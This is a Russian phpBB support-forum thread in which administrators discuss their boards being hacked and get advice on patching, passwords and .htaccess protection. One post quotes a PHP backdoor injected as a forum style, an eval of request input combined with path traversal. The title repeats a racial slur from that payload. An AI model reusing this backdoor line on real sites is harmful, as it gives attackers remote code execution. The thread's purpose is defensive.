Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
Взлом форума - NIGGA
-
- phpBB 1.0.0
- Сообщения: 2
- Стаж: 19 лет 8 месяцев
Взлом форума - NIGGA
Здравствуйте! У меня такая проблема. Сегодня мой форум был 2 раза взломан. Я в расстерянности.
Пользователь некто P06uH30H после того, как зарегистрировался "убил" все форумы. Мой форум находится здесь http://studio-77.hut1.ru/phpBB2/
Вот, что он мне написал, после того, как я заново установил форум:http://studio-77.hut1.ru/phpBB2/viewtopic.php?t=2
Как мне защитить форум от взлома?
Пользователь некто P06uH30H после того, как зарегистрировался "убил" все форумы. Мой форум находится здесь http://studio-77.hut1.ru/phpBB2/
Вот, что он мне написал, после того, как я заново установил форум:http://studio-77.hut1.ru/phpBB2/viewtopic.php?t=2
Как мне защитить форум от взлома?
-
- phpBB 1.0.0
- Сообщения: 2
- Стаж: 19 лет 8 месяцев
-
- phpBB 2.0.4
- Сообщения: 404
- Стаж: 20 лет 1 месяц
- Откуда: оттуда
Барминовский
Ну и админку закройте с помощью .htaccess. Тема уже здесь обсуждалась. Поиск по ключевому слову htaccess
Учим матчасть:
http://phpbbguru.net/community/viewtopic.php?t=2061
Ну и админку закройте с помощью .htaccess. Тема уже здесь обсуждалась. Поиск по ключевому слову htaccess
Учим матчасть:
http://phpbbguru.net/community/viewtopic.php?t=2061
-
- phpBB 1.0.0
- Сообщения: 5
- Стаж: 19 лет 11 месяцев
У меня тоже неделю назад взломали форум,
но у меня сначало сложилось впечатление,
что вскрыли админский пароль, потому как
просто грохнули все форумы и категории со
всеми сообщениями
Версия была 2.0.11
Покопав БД обнаружил новый шаблон(стиль) с заголовком:
Что случилось, как форум был взломан?
PS. Склоняюсь к мысле сменить движек форума...
но у меня сначало сложилось впечатление,
что вскрыли админский пароль, потому как
просто грохнули все форумы и категории со
всеми сообщениями
Версия была 2.0.11
Покопав БД обнаружил новый шаблон(стиль) с заголовком:
Код: Выделить всё
aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp
PS. Склоняюсь к мысле сменить движек форума...
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 5 месяцев
- Откуда: Бердск
Kevin
просто предохраняться надо.. уже месяц всем кричат "обновите версию форума до последней (конкретно это было залатано в 2.0.13) ... но мы все крутые и думаем, а чего мой форум то ломать...
просто предохраняться надо.. уже месяц всем кричат "обновите версию форума до последней (конкретно это было залатано в 2.0.13) ... но мы все крутые и думаем, а чего мой форум то ломать...
при вашем отношении к безопасности это ни к чему не приведетKevin писал(а):PS. Склоняюсь к мысле сменить движек форума...
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
- Former team member
- Сообщения: 816
- Стаж: 20 лет 7 месяцев
- Откуда: Estonia, Tallinn
Это кто-то "сплойт" (который позволяет выполнять произвольные комманды на серавере) но воспользоваться им можно только имея админские прова, избавиться от этого просто, надо удалить этот стиль, затем обновить версию до последней (конкретно это было залатано в 2.0.13), затем сменить все админские пароли (желательно одновременно)Kevin писал(а):Покопав БД обнаружил новый шаблон(стиль) с заголовком
Добавлено спустя 59 секунд:
доп-инфо - http://www.securitylab.ru/53295.html
Серый цвет - светлый (светлее чёрного), но он и тёмный (темнее белого), он же промежуточный (между чёрным и белым). Теорию относительности никто не отменял. Истина в целом - понятие виртуально-ситуативное.
-
- Former team member
- Сообщения: 582
- Стаж: 19 лет 11 месяцев
- Откуда: Москва
Барминовский, вы кстати не забыли сменить пароль доступа к БД? Он указывается в config.php, а то раньше у вас была ситуация - в первом форуме одна тема и в ней два сообщения (ваше и его), а счетчик сообщений на титульной странице показывал 0 (при этом судя по подписи внизу у вас стоял уже 2.0.13). Это говорит о том, что скорее всего у этого хацкера есть прямой доступ к вашей БД...
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
-
- phpBB 2.0.4
- Сообщения: 404
- Стаж: 20 лет 1 месяц
- Откуда: оттуда
Барминовский
1. Перестать биться в истерике.
2. Если есть аська и АйПи начинать давить на психику. Учтите, взлом форума квалифицируется по статье 273 п.1 УК РФ (до 3х лет). Правда, 14 летние дети неподсудны по этой статье, но это не обязательно афишировать. Все эти юные кулхацкеры храбры, пока их не ткнешь носом аки кутёнка. Скорее всего, дитё даже не умеет пользоваться анонимными прокси.
3. Файл .htaccess создайтся в любом текстовом редакторе. Либо обратитесь к хостеру, чтобы закрыл каталог admin паролем. Это можно сделать в конфигурации сервера.
1. Перестать биться в истерике.
2. Если есть аська и АйПи начинать давить на психику. Учтите, взлом форума квалифицируется по статье 273 п.1 УК РФ (до 3х лет). Правда, 14 летние дети неподсудны по этой статье, но это не обязательно афишировать. Все эти юные кулхацкеры храбры, пока их не ткнешь носом аки кутёнка. Скорее всего, дитё даже не умеет пользоваться анонимными прокси.
3. Файл .htaccess создайтся в любом текстовом редакторе. Либо обратитесь к хостеру, чтобы закрыл каталог admin паролем. Это можно сделать в конфигурации сервера.
-
- phpBB 1.2.1
- Сообщения: 24
- Стаж: 19 лет 9 месяцев
- Откуда: Геленджик
после неудачной установки стиля
"Если у вас есть доступ к phpMyAdmin'у на сервере "
Поясните пожалуйста подробно - пошагово где "это" искать - править.
Поясните пожалуйста подробно - пошагово где "это" искать - править.
Последний раз редактировалось andreysmorya 05.01.2006 9:15, всего редактировалось 1 раз.
andreysmorya, это приложение(набор скриптов) на вашем сервере, позволяющее управлять базами данных.
Если хостинг платный, то 99.9% что он должен быть установлен, смотрите в контрольной панели управления сайтом.
Если хостинг бесплатный, то вроятность присутствия пхпМайАдмина снижается.
Можно спросить у службы поддержки его местонахождение.
phpMyAdmin имеет интуитивно понятный интерфейс. Слева фрейм со списком имеющихся у вас баз данных, справа дополнительная информация, а при выборе БД, то её содержимое, т.е. таблицы.
Когда вы в левом фрейме выберите свою БД, ту, которую использует ваш форум (можно посмотреть в конфиге, если забыли), - справа появятся её таблицы.
Как я уже писал выше, вам необходимо выбрать таблицу phpbb_config
Открыть её на просмотр, напротив от таблицы есть кнопочки, выбирайте "Обзор".
Откроется содержмое данной таблицы.(учтите, содержимое находится на нескольких страницах) Далее ищете поля с названиями override_user_style и default_style. И тому и другому полю нужно присвоить значение "1".
Чтобы редактировать какое-либо поле, слева от него существует кнопочка "Правка".
Если что не ясно, пишите.
Если хостинг платный, то 99.9% что он должен быть установлен, смотрите в контрольной панели управления сайтом.
Если хостинг бесплатный, то вроятность присутствия пхпМайАдмина снижается.
Можно спросить у службы поддержки его местонахождение.
phpMyAdmin имеет интуитивно понятный интерфейс. Слева фрейм со списком имеющихся у вас баз данных, справа дополнительная информация, а при выборе БД, то её содержимое, т.е. таблицы.
Когда вы в левом фрейме выберите свою БД, ту, которую использует ваш форум (можно посмотреть в конфиге, если забыли), - справа появятся её таблицы.
Как я уже писал выше, вам необходимо выбрать таблицу phpbb_config
Открыть её на просмотр, напротив от таблицы есть кнопочки, выбирайте "Обзор".
Откроется содержмое данной таблицы.(учтите, содержимое находится на нескольких страницах) Далее ищете поля с названиями override_user_style и default_style. И тому и другому полю нужно присвоить значение "1".
Чтобы редактировать какое-либо поле, слева от него существует кнопочка "Правка".
Если что не ясно, пишите.
-
- phpBB 1.2.1
- Сообщения: 24
- Стаж: 19 лет 9 месяцев
- Откуда: Геленджик